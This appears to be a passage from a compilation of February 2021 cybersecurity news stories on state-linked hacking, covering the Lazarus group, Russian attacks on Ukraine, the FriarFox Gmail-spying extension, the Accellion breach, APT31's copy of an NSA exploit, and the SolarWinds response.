Using a custom tunneling tool, the adversary then attempted to create SSH tunnels from compromised server hosts to a remote server located in South Korea. In late September, the attackers started cleaning up their tracks from the router, eliminating most of the evidence of intrusion.
“We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group,” Kaspersky’s security researchers say.
The investigation also revealed links between ThreatNeedle and DeathNote (Operation Dream Job) and Operation AppleJeus, two clusters of activity previously attributed to Lazarus. Furthermore, ThreatNeedle also appears connected to the Bookcode cluster.
“In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks,” Kaspersky concludes.
Ukraine Says Russian Cyberspies Targeted Gov Agencies in Supply Chain Attack
26.2.2021 BigBrothers Securityweek
Ukraine’s National Security and Defense Council (NSDC) this week published two press releases describing cyberattacks aimed at the country.
One of them, issued on Wednesday, said the agency’s National Coordination Center for Cybersecurity (NCCC) had observed attempts to deliver malicious documents through the System of Electronic Interaction of Executive Bodies (SEI EB), which is used by many government organizations for sharing documents.
The NSDC said the malicious documents contained macro code designed to download a piece of malware that would allow the attackers to remotely control the compromised device.
Supply Chain Security SummitThe agency said it had linked the attack to “one of the hacker spy groups from the Russian Federation.” The incident was described as a supply chain attack and compared to the NotPetya attack of 2017 and the recently disclosed SolarWinds incident.
The NSDC has shared a handful of indicators of compromise related to this attack, including a domain and an IP address. Both appear to have been used by Gamaredon (aka Primitive Bear), a Russia-linked threat actor that, according to a recent report from Cisco, conducts its own operations, but also acts as a hack-for-hire group for other advanced persistent threat (APT) actors. Many of Gamaredon’s operations have focused on Ukraine.
Another press release, issued on Monday, said the NCCC had been seeing “massive DDoS attacks” since February 18. The attacks were aimed at websites related to the security and defense sectors, as well as other government organizations and “strategic enterprises.”
The NSDC said the attacks leveraged a “new mechanism” that had not been observed in previous incidents. In addition to the DDoS attacks themselves, the attackers delivered malware to government web servers, ensnaring them in a botnet used to launch DDoS attacks against others. This has led to government websites getting blocked by internet service providers, preventing users from accessing the sites even after the DDoS attacks stopped.
While the agency did not say the Russian government was behind these attacks, it said the attacks originated from IP addresses associated with “certain Russian traffic networks.”
Chinese Hackers Using Firefox Extension to Spy On Tibetan Organizations
26.2.2021 BigBrothers Thehackernews
Cybersecurity researchers today unwrapped a new campaign aimed at spying on vulnerable Tibetan communities globally by deploying a malicious Firefox extension on target systems.
"Threat actors aligned with the Chinese Communist Party's state interests delivered a customized malicious Mozilla Firefox browser extension that facilitated access and control of users' Gmail accounts," Proofpoint said in an analysis.
The Sunnyvale-based enterprise security company pinned the phishing operation on a Chinese advanced persistent threat (APT) it tracks as TA413, which has been previously attributed to attacks against the Tibetan diaspora by leveraging COVID-themed lures to deliver the Sepulcher malware with the strategic goal of espionage and civil dissident surveillance.
The researchers said the attacks were detected in January and February 2021, a pattern that has continued since March 2020.
The infection chain begins with a phishing email impersonating the "Tibetan Women's Association" using a TA413-linked Gmail account that's known to masquerade as the Bureau of His Holiness the Dalai Lama in India.
The emails contain a malicious URL, supposedly a link to YouTube, when in fact, it takes users to a fake "Adobe Flash Player Update" landing page where they are prompted to install a Firefox extension that Proofpoint calls "FriarFox."
For its part, the rogue extension — named "Flash update components" — disguises itself as an Adobe Flash-related tool, but the researchers said it's largely based on an open-source tool named "Gmail Notifier (restartless)" with significant alterations that add malicious capabilities, including incorporating modified versions of files taken from other extensions such as Checker Plus for Gmail.
The timing of this development is no coincidence, as Adobe officially began blocking Flash content from running in browsers starting January 12. The rich multimedia format reached end-of-life on December 31, 2020.
Interestingly, it appears that the operation is targeting only users of Firefox Browser who are also logged in to their Gmail accounts, as the add-on is never delivered in scenarios when the URL in question is visited on a browser such as Google Chrome or in cases where the access happens via Firebox, but the victims don't have an active Gmail session.
"In recent campaigns identified in February 2021, browser extension delivery domains have prompted users to 'Switch to the Firefox Browser' when accessing malicious domains using the Google Chrome Browser," the researchers said.
Besides having access to browser tabs and user data for all websites, the extension comes equipped with features to search, read, and delete messages and even forward and send emails from the compromised Gmail account.
Additionally, FriarFox also contacts an attacker-controlled server to retrieve a PHP and JavaScript-based payload called Scanbox.
Scanbox is a reconnaissance framework that enables attackers to track visitors to compromised websites, capture keystrokes, and harvest data that could be used to enable follow-on compromises. It has also been reported to have been modified in order to deliver second-stage malware on targeted hosts.
Campaigns using Scanbox were previously spotted in March 2019 by Recorded Future targeting visitors to the website of Pakistan's Directorate General of Immigration and Passports (DGIP) and a fake typosquatted domain claiming to be the official Central Tibetan Administration (CTA).
The introduction of the FriarFox browser extension in TA413's arsenal points to APT actors' "insatiable hunger" for access to cloud-based email accounts, says Sherrod DeGrippo, Proofpoint's senior director of threat research and detection.
"The complex delivery method of the tool [...] grants this APT actor near total access to the Gmail accounts of their victims, which is especially troubling as email accounts really are among the highest value assets when it comes to human intelligence," DeGrippo noted.
"Almost any other account password can be reset once attackers have access to someone's email account. Threat actors can also use compromised email accounts to send email from that account using the user's email signature and contact list, which makes those messages extremely convincing."
Russian Hackers Targeted Ukraine Authorities With Supply-Chain Malware Attack
26.2.2021 BigBrothers Thehackernews
Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities.
"The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities," the National Security and Defense Council of Ukraine (NSDC) said in a statement published on Wednesday.
The NSDC's National Coordination Center for Cybersecurity (NCCC) termed it a supply chain attack aimed at the System of Electronic Interaction of Executive Bodies (SEI EB), which is used to distribute documents to officials.
Calling it a work of threat actors with ties to Russia, the NSDC said the decoy documents came embedded with a macro that, when opened, stealthily downloaded malicious code to control the compromised system remotely.
"The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation," the agency said.
While the NSDC did not take any names, it's not immediately clear when the attack took place, how long the breach lasted, and if any of the infections were successful.
The development comes two days after the NSDC and NCCC warned of massive distributed denial-of-service (DDoS) attacks singling out websites belonging to the security and defense sector, including that of the NSDC.
"It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks," the NSDC said, while stopping short of directly accusing the country.
The NCCC also stated the "attackers used a new mechanism of cyberattacks" that involved using a previously undocumented strain of malware that was planted on vulnerable Ukrainian government servers, and in the process, coopted the devices into an attacker-controlled botnet.
The infected systems were then used to carry out further DDoS attacks on other Ukrainian sites, the agency said.
Ukraine: nation-state hackers hit government document management system
25.2.2021 BigBrothers Securityaffairs
Ukraine ‘s government attributes a cyberattack on the government document management system to a Russia-linked APT group.
The Ukraine ‘s government blames a Russia-linked APT group for an attack on a government document management system, the System of Electronic Interaction of Executive Bodies (SEI EB).
According to Ukrainian officials, the hackers aimed at disseminating malicious documents to government agencies.
The SEI EB is used by the Ukrainian government agencies to share documents.
According to Ukraine’s National Security and Defense Council, attackers acted to conduct “the mass contamination of information resources of public authorities.”
“The National Coordination Center for Cybersecurity under the National Security and Defense Council of Ukraine has recorded attempts to disseminate malicious documents through the System of Electronic Interaction of Executive Bodies (SEI EB).” reads a statement published by the NSDC.
“The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities.”
According to the Ukrainian authorities, the threat actors uploaded weaponized documents to the document management system. When the users that downloaded the files enabled the macros in the document, they would download and execute malware that allowed the attacker to take control of a victim’s computer.
“The malicious documents contained a macro that secretly downloaded a program to remotely control a computer when opening the files. The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation.” continues the statement.
“According to the scenario, the attack belongs to the so-called supply chain attacks. It is an attack in which attackers try to gain access to the target organization not directly, but through the vulnerabilities in the tools and services it uses.”
The NSDC did not attribute the attack to a specific Russia-linked cyberespionage group, the agency also provides indicators of compromise (IOCs) related to this attack.
Early this week, Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security and defense websites. The Ukrainian officials did not provide details about the attacks either the damage they have caused.
“It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks,” the Council said.
The Ukrainian authorities did not attribute the attack to a specific threat actor.
“Kyiv has previously accused Moscow of orchestrating large cyber attacks as part of a “hybrid war” against Ukraine, which Russia denies. However, a statement from Ukraine’s National Security and Defence Council did not disclose who it believed organized the attacks or give any details about the effect the intrusions may have had on Ukrainian cyber security.” reported The Reuters agency.
The massive attacks began on February 18, hackers targeted the websites of local institutions, including Ukraine’s Security Service and the council.
Washington Senate OKs Measure Creating State Office of Cybersecurity
25.2.2021 BigBrothers Securityweek
In response to a security breach that exposed personal information from around 1.6 million unemployment claims filed last year, the Washington Senate has unanimously passed a measure that creates a state Office of Cybersecurity.
The measure, passed by the chamber on Wednesday, creates the new office within the Office of the Chief Information Officer. The bill now heads to the House for consideration.
If passed by the full Legislature and signed by Gov. Jay Inslee, the office would set security policies and develop centralized protocols for managing the state’s information technology assets.
Earlier this month, the state auditor’s office said the breach involved third-party software used by the auditor’s office to transmit files. The software vendor, Accellion, announced last month that it had been attacked in December.
The measure would direct all state entities — institutions of higher education, the Legislature, the judiciary, and state agencies — to adopt programs that incorporate cybersecurity standards set by the office and to report any major cybersecurity incident within 24 hours.
The new office would be the point of contact for all policy related to data privacy and protection, and would be charged with investigating all major cybersecurity incidents.
Tech Firms Say There's Little Doubt Russia Behind Major Hack
24.2.2021 BigBrothers Securityweek
Leading technology companies said Tuesday that a months-long breach of corporate and government networks was so sophisticated, focused and labor-intensive that a nation had to be behind it, with all the evidence pointing to Russia.
In the first congressional hearing on the breach, representatives of technology companies involved in the response described a hack of almost breathtaking precision, ambition and scope. The perpetrators stealthily scooped up specific emails and documents on a target list from the U.S. and other countries.
“We haven’t seen this kind of sophistication matched with this kind of scale,” Microsoft President Brad Smith told the Senate Intelligence Committee.
Forensic investigators have estimated that at least 1,000 highly skilled engineers would have been required to develop the code that hijacked widely used network software from Texas-based SolarWinds to deploy malware around the world through a security update.
“We’ve seen substantial evidence that points to the Russian foreign intelligence agency and we have found no evidence that leads us anywhere else,” Smith said.
U.S. national security officials have also said Russia was likely responsible for the breach, and President Joe Biden’s administration is weighing punitive measures against Russia for the hack as well as other activities. Moscow has denied responsibility for the breach.
Officials have said the motive for the hack, which was discovered by private security company FireEye in December, appeared to be to gather intelligence. On what, they haven’t said.
At least nine government agencies and 100 private companies were breached, but what was taken has not been revealed.
White House press secretary Jen Psaki said Tuesday it would be “weeks not months” before the U.S. responds to Russia.
“We have asked the intelligence community to do further work to sharpen the attribution that the previous administration made about precisely how the hack occurred, what the extent of the damage is, and what the scope and scale of the intrusion is,” Psaki said. “And we’re still in the process of working that through now.”
FireEye CEO Kevin Mandia told the Senate that his company has had nearly 100 people working to study and contain the breach since they detected it, almost by accident, in December and alerted the U.S. government.
The hackers first quietly installed malicious code in October 2019 on targeted networks, but didn’t activate it to see if they could remain undetected. They returned in March and immediately began to steal the log-in credentials of people who were authorized to be on the network so they could have a “secret key” to move around at will, Mandia said.
Once detected “they vanished like ghosts,” he said.
“There’s no doubt in my mind that this was planned,” the security executive said. “The question really is where’s the next one, and when are we going to find it?”
Government agencies breached include the Treasury, Justice and Commerce departments, but the full list has not been publicly released. The president of Microsoft, which is working with FireEye on the response, said there are victims around the world, including in Canada, Mexico, Spain and the United Arab Emirates.
The panel, which also included Sudhakar Ramakrishna, the CEO of SolarWinds who took over the company after the hack occurred, and George Kurtz, the president and CEO of CrowdStrike, another leading security company, faced questions not just about how the breach occurred but also whether hacking victims need to be legally compelled to be forthcoming when they have been breached. Even now, three months after the breach was disclosed, the identity of most victims remains unknown.
Congress has considered in the past whether to require companies to report that they have been the victim of a hack, but it has triggered legal concerns, including whether they could be held liable by clients for the loss of data.
U.S. authorities are also considering whether to give additional resources and authority to the Cybersecurity and Infrastructure Agency or other agencies to be able to take a more forceful role in working to prevent future breaches.
Another measure that has been considered is to create a new agency, like the National Transportation Safety Board, that could quickly come in and evaluate a breach and determine whether there are problems that need to be fixed.
Sen. Ron Wyden, one of the most prominent voices on cyber issues in the Senate, warned that the U.S. must first make sure that government agencies breached in this incident have taken the required security measures.
“The impression that the American people might get from this hearing is that the hackers are such formidable adversaries that there was nothing that the American government or our biggest tech companies could have done to protect themselves,” said Wyden, an Oregon Democrat. “My view is that message leads to privacy-violating laws and billions of more taxpayer funds for cybersecurity.”
Australian Health and Transport Agencies Hit by Accellion Hack
24.2.2021 BigBrothers Securityweek
Transport for NSW, which is the main transport and roads agency in New South Wales, Australia, and NSW Health, the state’s ministry of health, are the latest confirmed victims of a cyber-attack targeting Accellion’s FTA file transfer service.
Transport for NSW says that some information was stolen before the attack on Accellion servers was interrupted and that an investigation is ongoing, but did not provide further details on the matter.
“Transport for NSW will ensure that any notification process for those affected will be clearly communicated and secure,” the company says.
In a statement related to the incident, Cyber Security NSW says that it is working with the NSW government to investigate the incident and assess the volume and value of data.
“Forensic analysis by industry specialists has established there was no third-party access to major agency systems including the Driver Licence systems, the Opal travel systems, or electronic medical records systems used by public hospitals,” Cyber Security NSW notes.
The cyber-incident happened in mid-December 2020, when a hacking group that FireEye’s Mandiant security researchers tracks as UNC2546 exploited an SQL injection flaw in FTA, which allowed it to deploy web shells and access customer data.
A total of four vulnerabilities in FTA were targeted in the attack, all of which have already been patched. However, Accellion is moving forth with plans to retire the service.
Designed to allow customers to transfer large files, FTA is over two decades old, and will no longer receive support past April 30, 2021. In December, Accellion served roughly 300 FTA customers, fewer than 100 of which were affected. However, up to 25 of them suffered significant data theft, the company says.
Transport for NSW and NSW Health are the latest organizations to have publicly confirmed the impact of the incident, after the U.S.-based grocery and pharmacy chain Kroger and law firm Jones Day made similar announcements over the past several days. To date, eight entities have confirmed impact from the incident.
Both Accellion and the affected customers have confirmed that the attackers only accessed data through the vulnerable FTA service, with no other systems being exposed.
The attackers, which FireEye linked to the TA505 spin-off FIN11, attempted to extort victims, threatening to share the stolen data publicly, and even following through with the threats in some cases.
With the looming end-of-life for FTA, Accellion continues to encourage customers to migrate to the enterprise content firewall platform kiteworks, promising free assistance during the transition.
Ukraine sites suffered massive attacks launched from Russian networks
23.2.2021 BigBrothers Securityaffairs
Ukraine ‘s government accused unnamed Russian traffic networks as the source of massive attacks on Ukrainian security and defense websites.
Today Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security and defense websites. The Ukrainian officials did not provide details about the attacks either the damage they have caused.
“It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks,” the Council said.
The Ukrainian authorities did not attribute the attack to a specific threat actor.
“Kyiv has previously accused Moscow of orchestrating large cyber attacks as part of a “hybrid war” against Ukraine, which Russia denies. However, a statement from Ukraine’s National Security and Defence Council did not disclose who it believed organized the attacks or give any details about the effect the intrusions may have had on Ukrainian cyber security.” reported The Reuters agency.
The massive attacks began on February 18, hackers targeted the websites of local institutions, including Ukraine’s Security Service and the council.
The threat actors attempted to compromise the targeted to deploy a DDoS bot.
“The council added the attacks attempted to infect vulnerable government web servers with a virus that covertly made them part of a botnet used for so-called distributed-denial-of-service (DDoS) attacks on other resources.” concludes the Reuters.
Georgetown County has yet to recover from a sophisticated cyber attack
23.2.2021 BigBrothers Securityaffairs
The systems of Georgetown County have been hacked at the end of January, and the county staff is still working to rebuild its computer network.
The systems of Georgetown County have been hit with a sophisticated cyber attack at the end of January, and the county staff is still working to recover from the incident.
The attack chain began with a malicious email, the intruders demanded the payment of a ransom to give back the control of the county’s systems to the its staff.
“Hackers sent an email Jan. 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said.” reads the associated press.
The county administration refused to pay the ransom and started cleaning infected systems, its IT experts have been working to restore the impacted network.
The county hired cybersecurity experts that have been involved in recovery operations. The cyber security confirmed that the attack that hit the county was sophisticated.
At the time of this writing, there is no indication that tax, employment or other private information was exfiltrated by the intruders.
The experts restored access to the email systems for about half of the employees at Georgetown County.
Georgetown County reported the incident to the authorities.
NSA Equation Group tool was used by Chinese hackers years before it was leaked online
23.2.2021 BigBrothers Securityaffairs
The Chinese APT group had access to an NSA Equation Group, NSA hacking tool and used it years before it was leaked online by Shadow Brokers group.
Check Point Research team discovered that China-linked APT31 group (aka Zirconium.) used a tool dubbed Jian, which is a clone of NSA Equation Group ‘s “EpMe” hacking tool years before it was leaked online by Shadow Brokers hackers.
In 2015, Kaspersky first spotted the NSA Equation Group, it revealed it was operating since at least 2001 and targeted almost any industry with sophisticated zero-day malware.
The arsenal of the hacking crew included sophisticated tools that requested a significant effort in terms of development, Kaspersky speculated the Equation Group has also interacted with operators behind Stuxnet and Flame malware.
Based on the evidence collected on the various cyber espionage campaigns over the years, Kaspersky experts hypothesize that the National Security Agency (NSA) is linked to the Equation Group.
Jian used the same Windows zero-day exploit that was stolen from the NSA Equation Group ‘s arsenal for years before it was addressed by the IT giant.
In 2017, the Shadow Brokers hacking group released a collection of hacking tools allegedly stolen from the US NSA, most of them exploited zero-day flaws in popular software.
One of these zero-day flaws, tracked as CVE-2017-0005, was a privileged escalation issue that affected Windows XP to Windows 8 operating systems,
“In this blog we show that CVE-2017-0005, a Windows Local-Privilege-Escalation (LPE) vulnerability that was attributed to a Chinese APT, was replicated based on an Equation Group exploit for the same vulnerability that the APT was able to access.” reads the analysis published by CheckPoint. ““EpMe”, the Equation Group exploit for CVE-2017-0005, is one of 4 different LPE exploits included in the DanderSpritz attack framework. EpMe dates back to at least 2013 – four years before APT31 was caught exploiting this vulnerability in the wild.”
Check Point discovered that the Jian tool was being actively utilized between 2014 and 2017, it dates its usage years before the vulnerability was addressed by Microsoft. The security firm also excluded that the tool was developed by the Chinese threat actors.
The EpMe hacking tool was included in the 2017 Shadow Brokers “Lost in Translation” leak.
The researchers pointed out that Lockheed Martin reported CVE-2017-0005 to Microsoft, this is the only vulnerability Lockheed Martin reported in recent years.
The experts speculate that APT31 group had obtained access to Equation Group’s hacking tool, likely because it was employed in attacks against Chinese targets. The Chinese hackers gained access to both 32- and 64-bit versions of the exploit module. An alternative hypothesis is that the Chinese APT group has stolen the tool from the Equation Group while their were spying on a target network also being monitored by APT31. We cannot exclude that APT31 has stolen the tool from Equation Group servers.
“Together with additional artifacts that match Equation Group artifacts and habits shared between all exploits even as far back as 2008” concludes Check Point “we can safely conclude the following”:
Equation Group’s EpMe exploit, existing since at least 2013, is the original exploit for the vulnerability later labeled CVE-2017-0005.
Somewhere around 2014, APT31 managed to capture both the 32-bit and 64-bit samples of the EpMe Equation Group exploit.
They replicated them to construct “Jian”, and used this new version of the exploit alongside their unique multi-staged packer.
Jian was caught by Lockheed Martin’s IRT and reported to Microsoft, which patched the vulnerability in March 2017 and labeled it CVE-2017-0005.
South Carolina County Rebuilds Network After Hacking
23.2.2021 BigBrothers Securityweek
A South Carolina county continues to rebuild its computer network after what it called a sophisticated hacking attempt.
Hackers sent an email Jan. 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said.
The county did not pay the ransom and has been working for the past month to restore email and the network and clean infected computers, Broach said in a statement.
The cyber security experts hired by the county said there is no indication that tax, employment or other private information was obtained by the hackers, Broach said.
Email on county addresses is back up for about half of Georgetown County’s employees, with technology workers putting a priority on addresses used by the public, Broach said.
Authorities are investigating the breach and aren’t releasing information on the hackers.
The cyber security experts told the county the attack was sophisticated, getting into the system through “something most people would have mistaken for being a legitimate email,” Broach said.
Chinese Hackers Had Access to a U.S. Hacking Tool Years Before It Was Leaked Online
23.2.2021 BigBrothers Thehackernews
On August 13, 2016, a hacking unit calling itself "The Shadow Brokers" announced that it had stolen malware tools and exploits used by the Equation Group, a sophisticated threat actor believed to be affiliated to the Tailored Access Operations (TAO) unit of the U.S. National Security Agency (NSA).
Although the group has since signed off following the unprecedented disclosures, new "conclusive" evidence unearthed by Check Point Research shows that this was not an isolated incident, and those other threat actors may have had access to some of the same tools before they were published.
The previously undocumented cyber-theft took place more than two years prior to the Shadow Brokers episode, the American-Israeli cybersecurity company said in an exhaustive report published today, resulting in U.S.-developed cyber tools reaching the hands of a Chinese advanced persistent threat which then repurposed them in order to strike American targets.
"The caught-in-the-wild exploit of CVE-2017-0005, a zero-day attributed by Microsoft to the Chinese APT31 (aka Zirconium), is in fact a replica of an Equation Group exploit codenamed 'EpMe,'" Check Point researchers Eyal Itkin and Itay Cohen said. "APT31 had access to EpMe's files, both their 32-bits and 64-bits versions, more than two years before the Shadow Brokers leak."
The Equation Group, so-called by researchers from cybersecurity firm Kaspersky in February 2015, has been linked to a string of attacks affecting "tens of thousands of victims" as early as 2001, with some of the registered command-and-control servers dating back to 1996. Kaspersky called the group the "crown creator of cyberespionage."
An Unknown Privilege Escalation Exploit
First revealed in March 2017, CVE-2017-0005 is a security vulnerability in the Windows Win32k component that could potentially allow elevation of privileges (EoP) in systems running Windows XP and up to Windows 8. The flaw was reported to Microsoft by Lockheed Martin's Computer Incident Response Team.
Check Point has named the cloned variant "Jian" after a double-edged straight sword used in China during the last 2,500 years, referencing its origins as an attack tool developed by the Equation Group that was then weaponized to serve as a "double-edged sword" to attack U.S. entities.
Timeline of the events detailing the story of EpMe / Jian / CVE-2017-0005
Jian is said to have been replicated in 2014 and put in operation since at least 2015 until the underlying flaw was patched by Microsoft in 2017.
APT31, a state-sponsored hacking collective, is alleged to conduct reconnaissance operations at the behest of the Chinese Government, specializing in intellectual property theft and credential harvesting, with recent campaigns targeting U.S. election staff with spear-phishing emails containing links that would download a Python-based implant hosted on GitHub, allowing an attacker to upload and download files as well as execute arbitrary commands.
Stating that the DanderSpritz post-exploitation framework contained four different Windows EoP modules, two of which were zero-days at the time of its development in 2013, Check Point said one of the zero-days — dubbed "EpMo" — was silently patched by Microsoft "with no apparent CVE-ID" in May 2017 in response to the Shadow Brokers leak. EpMe was the other zero-day.
DanderSpritz was among the several exploit tools leaked by the Shadow Breakers on April 14, 2017, under a dispatch titled "Lost in Translation." The leak is best known for publishing the EternalBlue exploit that would later power the WannaCry and NotPetya ransomware infections that caused tens of billions of dollars' worth of damage in over 65 countries.
This is the first time a new Equation Group exploit has come to light despite EpMo's source code being publicly accessible on GitHub since the leak almost four years ago.
For its part, EpMo was deployed in machines running Windows 2000 to Windows Server 2008 R2 by exploiting a NULL-Deref vulnerability in Graphics Device Interface's (GDI) User Mode Print Driver (UMPD) component.
Jian and EpMe Overlap
"On top of our analysis of both the Equation Group and APT31 exploits, the EpMe exploit aligns perfectly with the details reported in Microsoft's blog on CVE-2017-0005," the researchers noted. "And if that wasn't enough, the exploit indeed stopped working after Microsoft's March 2017 patch, the patch that addressed the said vulnerability."
Apart from this overlap, both EpMe and Jian have been found to share an identical memory layout and the same hard-coded constants, lending credence to the fact that one of the exploits was most probably copied from the other, or that both parties were inspired by an unknown third-party.
But so far, there are no clues alluding to the latter, the researchers said.
Interestingly, while EpMe didn't support Windows 2000, Check Point's analysis uncovered Jian to have "special cases" for the platform, raising the possibility that APT31 copied the exploit from the Equation Group at some point in 2014, before tweaking it to suit their needs and ultimately deploying the new version against targets, including possibly Lockheed Martin.
Reached for comment, a spokesperson for Lockheed Martin said "our cybersecurity team routinely evaluates third-party software and technologies to identify vulnerabilities and responsibly report them to developers and other interested parties."
Not the First Time
Check Point's findings are not the first time Chinese hackers have purportedly hijacked NSA's arsenal of exploits. In May 2019, Broadcom's Symantec reported that a Chinese hacking group called APT3 (or Buckeye) also had repurposed an NSA-linked backdoor to infiltrate telecom, media, and manufacturing sectors.
But unlike APT31, Symantec's analysis pointed out that the threat actor may have engineered its own version of the tools from artifacts found in captured network communications, potentially as a result of observing an Equation Group attack in action.
That Jian, a zero-day exploit previously attributed to APT31, is actually a cyber offensive tool created by the Equation Group for the same vulnerability signifies the importance of attribution for both strategic and tactical decision making.
"Even though 'Jian' was caught and analyzed by Microsoft at the beginning of 2017, and even though the Shadow Brokers leak exposed Equation Group's tools almost four years ago, there is still a lot one can learn from analyzing these past events," Cohen said.
"The mere fact that an entire exploitation module, containing four different exploits, was just lying around unnoticed for four years on GitHub, teaches us about the enormity of the leak around Equation Group tools."
FBI warns of the consequences of telephony denial-of-service (TDoS) attacks
22.2.2021 Attack BigBrothers Securityaffairs
The Federal Bureau of Investigation (FBI) has issued a warning about the risks of telephony denial-of-service (TDoS) attacks on call centers.
The United States’ Federal Bureau of Investigation (FBI) is warning of the consequences of telephony denial-of-service (TDoS) attacks on call centers, which in some cases could threaten people’s lives.
TDoS attacks could render telephone systems unavailable making it impossible to make and receive calls, a scaring scenario when the attackers target 911 or other emergency call centers.
TDoS attacks could be manual or automated. Threat actors behind manual TDoS attacks use social networks to encourage individuals to call a call center simultaneously flooding it.
An automated TDoS attack leverages specific applications that allows attackers to make tens or hundreds of calls simultaneously, caller attributes can be easily spoofed making it impossible to differentiate legitimate calls from malicious ones.
“A TDoS attack is an attempt to make a telephone system unavailable to the intended user(s) by preventing incoming and/or outgoing calls. The objective is to keep the distraction calls active for as long as possible to overwhelm the victim’s telephone system, which may delay or block legitimate calls for service. The resulting increase in time for emergency services to respond may have dire consequences, including loss of life.” reads the FBI’s public service announcement.
“TDoS attacks pose a genuine threat to public safety, especially if used in conjunction with a physical attack, by preventing callers from being able to request service. The public can protect themselves in the event that 911 is unavailable by identifying in advance non-emergency phone numbers and alternate ways to request emergency services in their area.”
The motivations behind this type of attacks are multiple, including hacktivism, financial gain through extortion, or harassment.
The FBI also provided a list of guidelines on how to prepare for a 911 outage:
Before there is an emergency, contact your local emergency services authorities for information on how to request service in the event of a 911 outage. Find out if text-to-911 is available in your area.
Have non-emergency contact numbers for fire, rescue, and law enforcement readily available in the event of a 911 outage.
Sign up for automated notifications from your locality if available to be informed of emergency situations in your area via text, phone call, or email.
Identify websites and follow social media for emergency responders in your area for awareness of emergency situations.
The US Government is going to respond to the SolarWinds hack very soon
21.2.2021 BigBrothers Securityaffairs
The US is going to respond to the SolarWinds supply chain attack within weeks, national security adviser Jake Sullivan told CNN.
The US will respond within weeks to the devastating SolarWinds supply cyber attack, national security adviser Jake Sullivan told CNN.
“We are in the process now of working through, with the intelligence community and [President Joe Biden’s] national security team, a series of steps to respond to Solar Winds, including steps that will hold who we believe is responsible for this and accountable, and you will be hearing about this in short order,” Sullivan said. “We’re not talking about months from now, but weeks from now, that the United States will be prepared to take the first steps in response to solar winds.”
This week, White House cybersecurity officials, announced that the investigation into the SolarWinds attack is likely to take “several months” at least.
Sullivan said the Biden administration is working to attribute the attack to a specific threat actor and properly respond to the offense.
“Right after President Biden took office, he tasked the intelligence community with an assessment of the scope and scale of this attack,” Sullivan said, speaking from the White House grounds. “And he also asked the intelligence community to provide him with an updated capacity to attribute exactly who conducted it. What the previous administration said was, quote, ‘that it was likely of Russian origin.’ We believe we can go further than that.”
Sullivan added that the response of the US government will be not limited to sanctions.
The national security adviser added that the US Government is working to harden its defenses to prevent a similar attack will happen again in the future.
“He added that there is also “intense work underway now to remediate this specific hack and ensure that the threat actor is expunged from federal government systems on a forward-going basis.” states CNN.
Suspected Russian Hack Fuels New US Action on Cybersecurity
20.2.2021 BigBrothers Securityweek
Jolted by a sweeping hack that may have revealed government and corporate secrets to Russia, U.S. officials are scrambling to reinforce the nation’s cyber defenses and recognizing that an agency created two years ago to protect America’s networks and infrastructure lacks the money, tools and authority to counter such sophisticated threats.
The breach, which hijacked widely used software from Texas-based SolarWinds Inc., has exposed the profound vulnerability of civilian government networks and the limitations of efforts to detect threats.
It’s also likely to unleash a wave of spending on technology modernization and cybersecurity.
“It’s really highlighted the investments we need to make in cybersecurity to have the visibility to block these attacks in the future,” Anne Neuberger, the newly appointed deputy national security adviser for cyber and emergency technology said Wednesday at a White House briefing.
The reaction reflects the severity of a hack that was disclosed only in December. The hackers, as yet unidentified but described by officials as “likely Russian,” had unfettered access to the data and email of at least nine U.S. government agencies and about 100 private companies, with the full extent of the compromise still unknown. And while this incident appeared to be aimed at stealing information, it heightened fears that future hackers could damage critical infrastructure, like electrical grids or water systems.
President Joe Biden plans to release an executive order soon that Neuberger said will include about eight measures intended to address security gaps exposed by the hack. The administration has also proposed expanding by 30% the budget of the U.S. Cybersecurity and Infrastructure Agency, or CISA, a little-known entity now under intense scrutiny because of the SolarWinds breach.
Biden, making his first major international speech Friday to the Munich Security Conference, said that dealing with “Russian recklessness and hacking into computer networks in the United States and across Europe and the world has become critical to protecting our collective security.”
Republicans and Democrats in Congress have called for expanding the size and role of the agency, a component of the Department of Homeland Security. It was created in November 2018 amid a sense that U.S. adversaries were increasingly targeting civilian government and corporate networks as well as the “critical” infrastructure, such as the energy grid that is increasingly vulnerable in a wired world.
Speaking at a recent hearing on cybersecurity, Rep. John Katko, a Republican from New York, urged his colleagues to quickly “find a legislative vehicle to give CISA the resources it needs to fully respond and protect us.”
Biden’s COVID-19 relief package called for $690 million more for CISA, as well as providing the agency with $9 billion to modernize IT across the government in partnership with the General Services Administration.
That has been pulled from the latest version of the bill because some members didn’t see a connection to the pandemic. But Rep. Jim Langevin, co-chair of the Congressional Cybersecurity Caucus, said additional funding for CISA is likely to reemerge with bipartisan support in upcoming legislation, perhaps an infrastructure bill.
“Our cyber infrastructure is every bit as important as our roads and bridges,” Langevin, a Rhode Island Democrat, said in an interview. “It’s important to our economy. It’s important to protecting human life, and we need to make sure we have a modern and resilient cyber infrastructure.”
CISA operates a threat-detection system known as “Einstein” that was unable to detect the SolarWinds breach. Brandon Wales, CISA’s acting director, said that was because the breach was hidden in a legitimate software update from SolarWinds to its customers. After it was able to identify the malicious activity, the system was able to scan federal networks and identify some government victims. “It was designed to work in concert with other security programs inside the agencies,” he said.
